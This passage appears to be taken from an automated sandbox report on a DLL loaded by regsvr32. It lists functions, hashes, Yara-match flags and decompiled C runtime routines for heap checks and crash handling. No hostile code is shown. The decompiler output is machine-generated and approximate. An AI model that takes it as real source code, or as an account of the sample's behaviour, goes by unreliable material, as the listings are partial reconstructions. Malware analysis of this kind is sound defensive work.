                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: EncodePointer
                                • String ID:
                                • API String ID: 2118026453-0
                                • Opcode ID: 486166b47cec33101184f167bfa082c8d21519f5c79393c344b51e77eb7d9bd4
                                • Instruction ID: 5c830059afc01ab3dffeb0f702370a5898bb96dd38ab511ff450623a486f5942
                                • Opcode Fuzzy Hash: 486166b47cec33101184f167bfa082c8d21519f5c79393c344b51e77eb7d9bd4
                                • Instruction Fuzzy Hash: F1A00224F16591D7DAAC373A5D9713D11A06B68709FF05869C74F40261CE2F92FE8B05
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Function 000007FEF9D30215 Relevance: 89.7, APIs: 29, Strings: 22, Instructions: 441COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invoke_watson_if_error$DebugOutputString$_invoke_watson_if_oneof$_itow_s_snwprintf_s_unlock_wcsftime_l
                                • String ID: %s(%d) : %s$(*_errno())$, Line $<file unknown>$Assertion failed!$Assertion failed: $P$Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportW$_itow_s(nLine, szLineMessage, 4096, 10)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrptt.c$strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")$wcscat_s(szLineMessage, 4096, L"\n")$wcscat_s(szLineMessage, 4096, L"\r")$wcscat_s(szLineMessage, 4096, szUserMessage)$wcscpy_s(szLineMessage, 4096, szFormat ? L"Assertion failed: " : L"Assertion failed!")$wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")$wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")$wcstombs_s(&ret, szaOutMessage, 4096, szOutMessage, ((size_t)-1))$wcstombs_s(((void *)0), szOutMessage2, 4096, szOutMessage, ((size_t)-1))
                                • API String ID: 4197005980-4190456261
                                • Opcode ID: 91caf2df9a40c10ca931429e5e540051a4e8143577a7dc19426bf0d901356392
                                • Instruction ID: 4be8715b722ea95f30444376ecaecfb3c385eb747484933fb25f7726159d970d
                                • Opcode Fuzzy Hash: 91caf2df9a40c10ca931429e5e540051a4e8143577a7dc19426bf0d901356392
                                • Instruction Fuzzy Hash: 5C422C31A0CA8691E7B0CB14E8547EE73E4F784345FA08226D6CD43AA9DF7EE549CB41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D30CC0 Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 140libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Pointer$Decode$AddressEncodeLibraryLoadProc
                                • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                • API String ID: 2256938910-232180764
                                • Opcode ID: 4136024d25ab454011a9418e3e33b4ea31b56a31dc25d7fc48a91c666a4aba5f
                                • Instruction ID: 2fdcab7defb259cab3e0ae5c8194edaf0e6743a208e28eb4b7718d98c4970bd2
                                • Opcode Fuzzy Hash: 4136024d25ab454011a9418e3e33b4ea31b56a31dc25d7fc48a91c666a4aba5f
                                • Instruction Fuzzy Hash: F581C531A09B8686E7A09B19FC4436EB3E0F784795F608135DACE42678DF7EE448CB41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D24A70 Relevance: 30.3, APIs: 2, Strings: 15, Instructions: 504COMMONLIBRARYCODE
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID:
                                • String ID: Client hook re-allocation failure at file %hs line %d.$Client hook re-allocation failure.$Error: memory allocation: bad memory block type.$Error: memory allocation: bad memory block type.Memory allocated at %hs(%d).$Error: possible heap corruption at or near 0x%p$Invalid allocation size: %Iu bytes.$Invalid allocation size: %Iu bytes.Memory allocated at %hs(%d).$The Block at 0x%p was allocated by aligned routines, use _aligned_realloc()$_CrtCheckMemory()$_CrtIsValidHeapPointer(pUserData)$_pFirstBlock == pOldBlock$_pLastBlock == pOldBlock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$fRealloc || (!fRealloc && pNewBlock == pOldBlock)$pOldBlock->nLine == IGNORE_LINE && pOldBlock->lRequest == IGNORE_REQ
                                • API String ID: 0-1181733849
                                • Opcode ID: caf568ba67e02e981cee0a62def33bb5426de77b0166e0249518d1aed8fc28ed
                                • Instruction ID: 672275d76b56a31b76a57beb3bef09bdc1cc68057209de26ab42cab730db0c01
                                • Opcode Fuzzy Hash: caf568ba67e02e981cee0a62def33bb5426de77b0166e0249518d1aed8fc28ed
                                • Instruction Fuzzy Hash: 27421F31A0DB8585EBA08B69E88076EB7E0F785790F214136DADD83BB4DB7ED440CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D253FB Relevance: 21.3, APIs: 2, Strings: 10, Instructions: 267memoryCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ, xrefs: 000007FEF9D257E9
                                • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer., xrefs: 000007FEF9D2579F
                                • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c, xrefs: 000007FEF9D254F7, 000007FEF9D2556D, 000007FEF9D257FE
                                • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D2573C
                                • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer., xrefs: 000007FEF9D25683
                                • The Block at 0x%p was allocated by aligned routines, use _aligned_free(), xrefs: 000007FEF9D2542B
                                • _BLOCK_TYPE_IS_VALID(pHead->nBlockUse), xrefs: 000007FEF9D25558
                                • _CrtIsValidHeapPointer(pUserData), xrefs: 000007FEF9D254E2
                                • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25620
                                • Client hook free failure., xrefs: 000007FEF9D254A0
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: HeapPointerValid_free_base
                                • String ID: Client hook free failure.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$The Block at 0x%p was allocated by aligned routines, use _aligned_free()$_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$_CrtIsValidHeapPointer(pUserData)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ
                                • API String ID: 1656799702-182684663
                                • Opcode ID: 5020832333ec35d85279f4adfeb03ce22c38d55cbbbf155ecd90f9052befc044
                                • Instruction ID: a89e9ee482389454aa7ea2a98c74fcfc2c6f72e51cab5ee636fbf14708ed73c9
                                • Opcode Fuzzy Hash: 5020832333ec35d85279f4adfeb03ce22c38d55cbbbf155ecd90f9052befc044
                                • Instruction Fuzzy Hash: 51C17D36A18B4586EBA48B59E88076EB7E0F785790F614536EBCD43BB4DB7ED440CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D25CAD Relevance: 17.8, Strings: 14, Instructions: 322COMMON
                                Download Yara Rule
                                Strings
                                • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer., xrefs: 000007FEF9D26030
                                • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25FE7
                                • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d)., xrefs: 000007FEF9D260C7
                                • _heapchk fails with _HEAPBADNODE., xrefs: 000007FEF9D25D19
                                • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed., xrefs: 000007FEF9D260FA
                                • %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d)., xrefs: 000007FEF9D2617C
                                • DAMAGED, xrefs: 000007FEF9D25E7D
                                • _heapchk fails with _HEAPBADBEGIN., xrefs: 000007FEF9D25CE5
                                • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer., xrefs: 000007FEF9D25F42
                                • _heapchk fails with _HEAPBADPTR., xrefs: 000007FEF9D25D7E
                                • _heapchk fails with _HEAPBADEND., xrefs: 000007FEF9D25D4D
                                • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25EF9
                                • _1, xrefs: 000007FEF9D261FC
                                • _heapchk fails with unknown return value!, xrefs: 000007FEF9D25DAF
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID:
                                • String ID: %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d).$DAMAGED$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d).$_heapchk fails with _HEAPBADBEGIN.$_heapchk fails with _HEAPBADEND.$_heapchk fails with _HEAPBADNODE.$_heapchk fails with _HEAPBADPTR.$_heapchk fails with unknown return value!$_1
                                • API String ID: 0-510578482
                                • Opcode ID: ecaeb8f0e9f50f2af9e26624824c00194ce636c943c5c9e443a2ba6a1604b1b7
                                • Instruction ID: e4bd894b2b1f7b9ef1ad6a2df7423bb6029b32d077619e3c403e9c7133be1b2d
                                • Opcode Fuzzy Hash: ecaeb8f0e9f50f2af9e26624824c00194ce636c943c5c9e443a2ba6a1604b1b7
                                • Instruction Fuzzy Hash: EDE14F36A1CB5586EBA4CB69E88072EB7E0F384754F614526EACD43BB4DB7ED051CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D23280 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                                Download Yara Rule
                                C-Code - Quality: 57%
                                			E000007FE7FEF9D23280(void* __eax, signed int __ecx, signed int __edx, signed int __rcx, signed int __rdx, void* __r8) {
				void* _t7;
				void* _t10;
				signed long long _t15;
				signed long long* _t16;
				signed long long _t20;
				signed long long _t24;

				_t7 = __rcx -  *0xf9d4b018; // 0x6ebd4e3f5ce4
				if (_t7 != 0) goto 0xf9d2329a;
				asm("dec eax");
				if ((__ecx & 0x0000ffff) != 0) goto 0xf9d23296;
				asm("repe ret");
				asm("dec eax");
				goto 0xf9d23720;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("o16 nop [eax+eax]");
				if (__r8 - 8 < 0) goto 0xf9d2330c;
				_t20 = __rdx * 0x1010101;
				_t10 = __r8 - 0x40;
				if (_t10 < 0) goto 0xf9d232ee;
				_t15 =  ~__rcx;
				if (_t10 == 0) goto 0xf9d232de;
				 *__rcx = _t20;
				_t16 = _t15 + __rcx;
				if (_t10 != 0) goto 0xf9d23327;
				_t24 = __r8 - _t15 & 7;
				if (_t10 == 0) goto 0xf9d2330c;
				 *_t16 = _t20;
				if (_t10 != 0) goto 0xf9d23300;
				if (_t24 == 0) goto 0xf9d2331b;
				_t16[1] = __edx & 0x000000ff;
				if (_t24 - 1 != 0) goto 0xf9d23311;
				return __eax;
			}









                                0x7fef9d23280
                                0x7fef9d23287
                                0x7fef9d23289
                                0x7fef9d23292
                                0x7fef9d23294
                                0x7fef9d23296
                                0x7fef9d2329a
                                0x7fef9d2329f
                                0x7fef9d232a0
                                0x7fef9d232a1
                                0x7fef9d232a2
                                0x7fef9d232a3
                                0x7fef9d232a4
                                0x7fef9d232a5
                                0x7fef9d232a6
                                0x7fef9d232b7
                                0x7fef9d232c6
                                0x7fef9d232ca
                                0x7fef9d232ce
                                0x7fef9d232d0
                                0x7fef9d232d6
                                0x7fef9d232db
                                0x7fef9d232de
                                0x7fef9d232ec
                                0x7fef9d232f1
                                0x7fef9d232f9
                                0x7fef9d23300
                                0x7fef9d2330a
                                0x7fef9d2330f
                                0x7fef9d23311
                                0x7fef9d23319
                                0x7fef9d2331b

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                • String ID:
                                • API String ID: 3778485334-0
                                • Opcode ID: b9a945e82b5db3173e30537439e0c8a0a2586c91a17b1594fbe54d080f64dea2
                                • Instruction ID: 1cff5b4ce0ef1e4e3ef6199276dfa804718153c0ec8d85c09348b02a89a91835
                                • Opcode Fuzzy Hash: b9a945e82b5db3173e30537439e0c8a0a2586c91a17b1594fbe54d080f64dea2
                                • Instruction Fuzzy Hash: 0F31B435908B4685EAA09B69FD443AEB3E0F784794F608026DACD43775DF7EE0588B01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180019AF0 Relevance: 10.7, Strings: 8, Instructions: 710COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !f3$/w 8$CZ&B$KE$XW]${H$~V$ehl
                                • API String ID: 0-603092622
                                • Opcode ID: 1ed8f1f3fe5d83a620da9bed02dcbbab86e8a919e24c18f8a00020719e4cb4ac
                                • Instruction ID: cfa183faa2580dac9c87674e45a13d453ed6874265d0529349a04ca9f57a85af
                                • Opcode Fuzzy Hash: 1ed8f1f3fe5d83a620da9bed02dcbbab86e8a919e24c18f8a00020719e4cb4ac
                                • Instruction Fuzzy Hash: 079206752047888BDBB8CF24D8897CE7BE1FB86354F10451DE94E8AA60DBB89744CF42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D2443C Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 112COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _unlock
                                • String ID: Client hook allocation failure at file %hs line %d.$Client hook allocation failure.$Invalid allocation size: %Iu bytes.$_CrtCheckMemory()$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                • API String ID: 2480363372-3680694803
                                • Opcode ID: 20c9d93c7bd8e5bb28edf4ede7e61cb74df2466a6d8b2339d4d317b1b63016a2
                                • Instruction ID: 043f5a1d32994ed4de3068b5f716ee40183123659e8364044ce03f87ba7bfcf6
                                • Opcode Fuzzy Hash: 20c9d93c7bd8e5bb28edf4ede7e61cb74df2466a6d8b2339d4d317b1b63016a2
                                • Instruction Fuzzy Hash: 6D510A31A096828AE7F48B68EC4576E73E4F395354F614135DADD83BB4DB3EE4448B01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000001800165E4 Relevance: 10.4, Strings: 8, Instructions: 443COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: -~$!X$"98$5%dv$RXrB$}k=$t$t
                                • API String ID: 0-2601355769
                                • Opcode ID: 1ffe31184e489043dfc0ad9b25877cc2ca41a6506ccf0b542c306d1cb23fc7eb
                                • Instruction ID: 40fa059977533c12daa4c197ac7ec32be5dd4a9ad21ad0dd792eee812670dda9
                                • Opcode Fuzzy Hash: 1ffe31184e489043dfc0ad9b25877cc2ca41a6506ccf0b542c306d1cb23fc7eb
                                • Instruction Fuzzy Hash: 4E32F4B1A0578C8BCBB9CF68C8997DD7BF0FB48318F90521DEA099B251CB745A45CB18
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018001DBFC Relevance: 10.0, Strings: 7, Instructions: 1221COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: #X$$3$1P$H<,D$I$e$e
                                • API String ID: 0-63615268
                                • Opcode ID: f878a82ca4faae8fe20105a06ae6298662dc00276aeafef1a86afe3292831526
                                • Instruction ID: 84603d17c853973844c2c43058df0d3f37fc759f8199a5ada31f3ca4409f6e56
                                • Opcode Fuzzy Hash: f878a82ca4faae8fe20105a06ae6298662dc00276aeafef1a86afe3292831526
                                • Instruction Fuzzy Hash: 64E2CF715046898BDBF9DF24C88A7DD3BA1BB44344FA0C119E88ECE291DF745A8DEB41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000001800091A8 Relevance: 9.4, Strings: 7, Instructions: 640COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: $*TG$Ag9$N?$`S$jk7$yHb
                                • API String ID: 0-938425255
                                • Opcode ID: a8480cca88ee067c9f89c24fcf558755f915344c34e6418cf6ef844eb024a60c
                                • Instruction ID: 9f34faa7130dc1dd87f506cddbfe67dee9fd1f9295814769d0e47bce79b2000f
                                • Opcode Fuzzy Hash: a8480cca88ee067c9f89c24fcf558755f915344c34e6418cf6ef844eb024a60c
                                • Instruction Fuzzy Hash: 6D62E371A0530CDFCB59DFA8D18A6DDBBF1FF48344F004119E84AA72A0D7B4991ACB89
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018001F908 Relevance: 9.2, Strings: 7, Instructions: 464COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: #X$3A<7$B.$Jq^$eIas$p<c$~;-
                                • API String ID: 0-2724674699
                                • Opcode ID: c830ff2e536ec82d4aacd995a299ed7dc96ce275305048a2346641cb28e12bef
                                • Instruction ID: 11eaaa9cd8c54950f626fcd1c6608fbf38bfda5f45ba0fc90d4db62925cbbc4d
                                • Opcode Fuzzy Hash: c830ff2e536ec82d4aacd995a299ed7dc96ce275305048a2346641cb28e12bef
                                • Instruction Fuzzy Hash: 4142EAB090438C8BCBB8DF64C8857DD7BF0FB48308F50852DEA1A9B251DBB05685CB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D2BE50 Relevance: 9.1, APIs: 6, Instructions: 79COMMONLIBRARYCODE
                                Download Yara Rule
                                C-Code - Quality: 33%
                                			E000007FE7FEF9D2BE50(intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24) {
				intOrPtr _v4;
				void* _v12;
				signed long long _v24;
				signed int _v36;
				long long _v180;
				long long _v184;
				intOrPtr _v192;
				char _v196;
				intOrPtr _v204;
				long _v212;
				long long _v220;
				long long _v228;
				long long _v1212;
				long long _v1308;
				char _v1460;
				char _v1476;
				char _v1484;
				int _v1492;
				long long _v1500;
				long long _v1508;
				long long _v1516;
				long long _v1524;
				long long _v1532;
				long long _v1540;
				void* _t51;
				signed long long _t80;
				long long _t85;
				void* _t100;

				_a24 = r8d;
				_a16 = __edx;
				_a8 = __ecx;
				_t80 =  *0xf9d4b018; // 0x6ebd4e3f5ce4
				_v24 = _t80 ^ _t100 - 0x00000610;
				if (_a8 == 0xffffffff) goto 0xf9d2be8d;
				E000007FE7FEF9D28D90(_t51, _a8);
				_v184 = 0;
				memset(__edi, 0, 0x94 << 0);
				_v1508 =  &_v196;
				_v1500 =  &_v1460;
				_v1492 = 0;
				_v212 = 0;
				__imp__RtlCaptureContext();
				_t85 = _v1212;
				_v220 = _t85;
				r8d = 0;
				0xf9d40e28();
				_v228 = _t85;
				if (_v228 == 0) goto 0xf9d2bf64;
				_v1516 = 0;
				_v1524 =  &_v1476;
				_v1532 =  &_v1484;
				_v1540 =  &_v1460;
				0xf9d40e22();
				goto 0xf9d2bf84;
				_v1212 = _v12;
				_v1308 =  &_v12;
				_v196 = _a4;
				_v192 = _a12;
				_v180 = _v12;
				_v1492 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(??);
				_v212 = UnhandledExceptionFilter(??);
				if (_v212 != 0) goto 0xf9d2bffb;
				if (_v1492 != 0) goto 0xf9d2bffb;
				if (_v4 == 0xffffffff) goto 0xf9d2bffb;
				return E000007FE7FEF9D23280(E000007FE7FEF9D28D90(_t59, _v4), _v4, __edx, _v36 ^ _t100 - 0x00000610, _v204, _v220);
			}































                                0x7fef9d2be50
                                0x7fef9d2be55
                                0x7fef9d2be59
                                0x7fef9d2be65
                                0x7fef9d2be6f
                                0x7fef9d2be7f
                                0x7fef9d2be88
                                0x7fef9d2be8d
                                0x7fef9d2beaa
                                0x7fef9d2beb4
                                0x7fef9d2bebe
                                0x7fef9d2bec3
                                0x7fef9d2becb
                                0x7fef9d2bedb
                                0x7fef9d2bee1
                                0x7fef9d2bee9
                                0x7fef9d2bef1
                                0x7fef9d2bf04
                                0x7fef9d2bf09
                                0x7fef9d2bf1a
                                0x7fef9d2bf1c
                                0x7fef9d2bf2a
                                0x7fef9d2bf34
                                0x7fef9d2bf3e
                                0x7fef9d2bf5d
                                0x7fef9d2bf62
                                0x7fef9d2bf6c
                                0x7fef9d2bf7c
                                0x7fef9d2bf8b
                                0x7fef9d2bf99
                                0x7fef9d2bfa8
                                0x7fef9d2bfb6
                                0x7fef9d2bfbc
                                0x7fef9d2bfcd
                                0x7fef9d2bfdc
                                0x7fef9d2bfe3
                                0x7fef9d2bfed
                                0x7fef9d2c013

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
